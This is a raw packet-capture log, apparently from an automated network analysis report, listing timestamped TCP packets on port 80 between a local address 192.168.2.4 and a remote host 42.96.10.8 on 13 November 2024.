                                                                                                                                                                                                            Nov 13, 2024 13:25:17.010379076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.010415077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.010447025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.010483027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.010488033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.010488033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.010519028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.010601044 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.028165102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.028218985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.028259039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.028363943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.028827906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.028887033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.028939009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.028970003 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.028974056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.029012918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.029055119 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.029055119 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.029146910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.029182911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.029217005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.029228926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.029378891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.029414892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.029428959 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.029449940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.029524088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.029555082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.029581070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.029618025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.029628992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.029670954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.029705048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.029738903 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.030179977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.030215025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.030239105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.030251026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.030284882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.030319929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.030354023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.030366898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.030366898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.030390978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.030424118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.030463934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.030484915 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.030502081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.030811071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.030868053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.030868053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.030906916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.030960083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.030996084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.031008005 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.031032085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.031141996 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.073599100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.073689938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.073723078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.073751926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.073759079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.073829889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.126034021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.126077890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.126116037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.126152992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.126188040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.126203060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.126203060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.126224041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.126260042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.126300097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.126315117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.127357006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.143528938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.143565893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.143603086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.143619061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.144331932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.144392967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.144413948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.144428015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.144463062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.144506931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.144510984 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.144562960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.144591093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.144597054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.144634008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.144648075 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.144670010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.144865036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.144934893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145052910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145056963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145092010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145126104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145159006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145172119 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145172119 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145325899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145380974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145381927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145416975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145454884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145468950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145531893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145585060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145598888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145620108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145688057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145739079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145740032 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145740032 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145773888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145807981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145821095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145844936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145873070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.145979881 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.146219015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.146271944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.146323919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.146342993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.146358013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.146392107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.146435976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.146701097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.186032057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.186122894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.186239958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.189194918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.189230919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.189266920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.189270973 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.241583109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.241627932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.241647959 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.241688013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.241724968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.241728067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.241763115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.241796970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.241820097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.241856098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.241889954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.241920948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.241926908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.243340015 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.259175062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.259210110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.259243965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.259267092 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260107040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260152102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260171890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260193110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260252953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260255098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260308027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260343075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260375977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260411024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260420084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260420084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260445118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260483027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260493040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260519028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260576010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260601997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260606050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260647058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260687113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260703087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260736942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260771990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260807037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260814905 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.260814905 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.261025906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.261080980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.261136055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.261157036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.261172056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.261215925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.261224031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.261259079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.261293888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.261329889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.261358023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.261370897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.261370897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.261436939 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.261739016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.261796951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.261832952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.261868954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.261887074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.261923075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.261955976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.261990070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.262001991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.262026072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.262056112 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.262109995 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.304955959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.304994106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.305030107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.305043936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.305228949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.305263042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.305351973 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.352520943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.358416080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.358459949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.358496904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.358530045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.358566999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.359353065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.374980927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.375031948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.375067949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.375104904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.375119925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.375119925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.375144005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.375258923 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.375401974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.375437021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.375473976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.375538111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.375632048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.375741959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.375766993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.375773907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.375811100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.375844955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.375859976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.375883102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.375945091 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.375987053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.376022100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.376032114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.376056910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.376132011 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.376218081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.376275063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.376310110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.376343012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.376389027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.376465082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.376498938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.376533985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.376588106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.376599073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.376625061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.376661062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.376686096 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.376698971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.376727104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.376812935 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.376822948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.376930952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.376985073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.377019882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.377032042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.377074003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.377129078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.377142906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.377166033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.377199888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.377222061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.377238989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.377268076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.377430916 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.377513885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.377574921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.377609015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.377641916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.377664089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.420716047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.420761108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.420784950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.420799017 CET804973342.96.10.8192.168.2.4
